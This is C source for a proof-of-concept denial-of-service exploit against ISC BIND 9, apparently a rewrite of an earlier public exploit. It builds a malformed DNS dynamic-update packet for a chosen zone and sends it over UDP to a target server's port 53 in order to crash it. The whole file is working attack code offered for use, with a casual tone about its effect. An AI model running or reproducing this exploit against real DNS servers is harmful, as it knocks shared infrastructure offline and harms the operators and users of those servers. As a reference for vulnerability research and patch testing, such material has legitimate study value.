/* ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC "Based on: http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt by kingcope - this is basically a rewrite of the above, lame i know, but fun enough for the [zone] argument you can try what is in the named.conf with "type master" */ #include #include #include #include #include #include #include #include #include #define PORT 31337 struct dnspkt1 { unsigned short transact; unsigned short flags; unsigned short zones; unsigned short pr; unsigned short updates; unsigned short rrs; }; struct dnspkt2 { unsigned short type; unsigned short class; unsigned short name2; unsigned short type2; unsigned short class2; unsigned short ttl1; unsigned short ttl2; unsigned short datalen; unsigned short name3; unsigned short type3; unsigned short class3; unsigned short ttl3; unsigned short ttl4; unsigned short datalen2; }; int packdomain(char * dest, const char *src) { int i,n,cnt; n=strlen(src); dest[n+1]=0; // terminator cnt=0; for (i=n; i>0; i--) { if (src[i-1]=='.') { dest[i]=cnt; cnt=0; } else { dest[i]=src[i-1]; cnt++; } } dest[0]=cnt; return n+2; } int main(int argc, char **argv) { int sockfd, clilen; struct sockaddr_in serv_addr, cli_addr; struct dnspkt1 d1; struct dnspkt2 d2; printf("ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\n"); printf("Based on:\n"); printf("http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\n"); printf("by kingcope - this is basically a rewrite of the above, lame i know, but fun tough\n"); if (argc < 2) { printf("usage: %s [zone]\n", argv[0]); return 0; } sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sockfd < 0) { printf("error on socket() call"); return -1; } memset(&serv_addr, '\0', sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = INADDR_ANY; serv_addr.sin_port = htons(PORT); if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) { printf("error binding socket\n"); return -1; } memset(&cli_addr, '\0', sizeof(cli_addr)); cli_addr.sin_family = AF_INET; cli_addr.sin_addr.s_addr = inet_addr(argv[1]); cli_addr.sin_port = htons(53); memset(&d1, '\0', sizeof(d1)); memset(&d2, '\0', sizeof(d2)); d1.transact = htons(0x1cd6); d1.flags = htons(0x2800); d1.zones = htons(0x0001); d1.pr = htons(0x0001); d1.updates = htons(0x0001); d1.rrs = 0; char *name = (char*)malloc(8096); char nam[1024]; if (argc < 3) { /* Not sure if this is right to set as default, have no clue about dns proto It works for me.. */ strcpy(nam, "127.in-addr.arpa"); } else { strncpy(nam, argv[2], sizeof(nam)); nam[sizeof(nam)-1]=0; } int n=packdomain(name, (char*)nam); d2.type = htons(0x0006); d2.class = htons(0x0001); d2.name2 = htons(0xc00c); d2.type2 = htons(0x00ff); d2.class2 = htons(0x0001); d2.datalen = 0; d2.name3 = htons(0xc00c); d2.type3 = htons(0x00ff); d2.class3 = htons(0x00ff); d2.ttl1 = 0; d2.ttl2 = 0; d2.ttl3 = 0; d2.ttl4 = 0; d2.datalen2 = 0; char buffer[10000]; memcpy(buffer, &d1, sizeof(d1)); memcpy(buffer+sizeof(d1), name, n); memcpy(buffer+sizeof(d1)+n, &d2, sizeof(d2)); clilen=sizeof(cli_addr); sendto(sockfd, buffer, sizeof(d1)+sizeof(d2)+n, 0, (struct sockaddr *)&cli_addr, sizeof(cli_addr)); printf("aight!\n"); return 0; }